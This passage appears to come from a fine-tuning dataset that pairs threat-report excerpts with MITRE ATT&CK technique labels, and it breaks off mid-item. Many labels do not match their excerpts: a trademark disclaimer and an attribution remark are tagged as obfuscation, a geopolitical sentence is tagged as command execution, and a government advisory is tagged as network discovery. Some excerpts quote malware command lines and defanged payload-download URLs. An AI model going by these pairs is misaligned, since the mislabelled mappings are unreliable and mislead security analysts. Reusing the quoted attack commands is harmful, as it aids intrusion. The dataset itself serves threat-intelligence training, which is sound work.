Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses to inject shellcode into PowerShell.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses VNC to connect into systems.", + "output": "- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses ZPP, a .NET console program, to compress files with ZIP.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe, as well as by adding a new service named OfficeUpdateService.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use to establish an RDP connection with a controller over TCP/7519.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "will identify Microsoft Office documents on the victim's computer.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "will sleep until after a date/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim.", + "output": "- T1108: Redundant Access" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS instead if the DES decoding fails.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems \u2013 Windows, OSX, Linux, even mobile iOS", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This targeting of third party organizations to attack further targets is a risky move on the attackers\u2019 part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 3: ALFA TEaM Shell v2-Fake Mail (Default) Figure 4 shows an example email containing the default values the shell", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "!CMD Trojan executes a command prompt command", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Trojan will save the output of the command to %TEMP%\\win.txt and send the contents to the C2 server or \u201cThe length of Cmd result file is ziro!\u201d if the command was unsuccessful", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Visual Basic macro uses the following command line: cmd /c expand %TEMP%\\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe The control server credential information contained in the CAB files is different: Decoded credential data contained in another ipnet.ini", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Supported commands \u201cupload\u201c, \u201cscreenshot\u201c, \u201cExcel\u201c, \u201cOutlook\u201c, \u201crisk\u201c, \u201creboot\u201c, \u201cshutdown\u201c, \u201cclean\u201c", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal: Figure 28.\u00a0Commands used for downloading and executing, and running a command in terminal Figure 29.\u00a0Commands used in uploading and downloading file Figure 30", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware basically provides a remote CMD/PowerShell terminal for the attackers, enabling them to execute scripts/commands and receive the results via HTTP requests", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Open interactive python shells with auto-completion on the all-in-memory remote python interpreter", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1: SpeakUp\u2019s Victim Distribution Figure 2: SpeakUp\u2019s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Messages are encrypted using AES with a static key", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tool Type Internal Name Industry Name Backdoor Poison Frog BONDUPDATER Backdoor Glimpse Updated BONDUPDATER Webshell HyperShell TwoFace loader Webshell HighShell TwoFace payload Webshell Minion TwoFace payload variant DNS Hijacking Toolkit webmask Related to DNSpionage Table 1", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The HyperShell and HighShell webshells are variants of what we track as TwoFace, with HyperShell being related to the TwoFace loader and HighShell being related to the TwoFace payload, as we reported in July 2017", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s): [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/ArabicBrowserFont.exe [unknown SHA256] Downloads payload from: hxxps://raw.githubusercontent[.]com/F0R3X/BrowserFontArabic/master/FontArabic.exe 9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others) Downloads payload from: hxxps://raw.githubusercontent[.]com/ReactDeveloper2017/react/master/src/test/test.js Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy as shown in figure 2", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious obfuscated VBA code is executed when the macro is first enabled", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors have made some small changes, such as altering the variable names to avoid Yara detection", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The encryption/decryption routine (refer to Figure 5) can be summarized as follows: Figure 5: Encryption/ Decryption Function Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Version 2 Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The structure of each of these outbound DNS requests is as follows: ---. The payload will look for different responses to these outbound queries depending on the type of DNS request that the payload uses to communicate with the C2", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": ".. \u00a0 After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2: \u00a0 .. \u00a0 To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Backdoor.Pirpi also collects information about the target\u2019s local network, including the domain controller and workstations", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization.When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "text= 